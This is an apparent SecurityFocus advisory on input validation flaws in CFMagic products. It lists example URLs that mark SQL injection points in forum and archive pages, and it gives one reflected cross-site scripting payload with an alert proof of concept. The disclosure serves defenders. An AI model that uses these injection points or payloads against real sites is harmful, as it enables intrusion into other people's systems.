CFMagic Multiple Products Input Validation Vulnerabilities

No exploit is required.

Example URI have been provided:

http://www.example.com/view_archive.cfm?ListID=[SQL]

http://www.example.com/view_forum.cfm?ForumID=1[SQL]

http://www.example.com/view_thread.cfm?ForumID=1[SQL]

http://www.example.com/view_thread.cfm?ForumID=1&ThreadID=1&Thread=1[SQL]

http://www.example.com/view_thread.cfm?ForumID=1&ThreadID=1[SQL]

http://www.example.com/book.cfm?StartRow=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus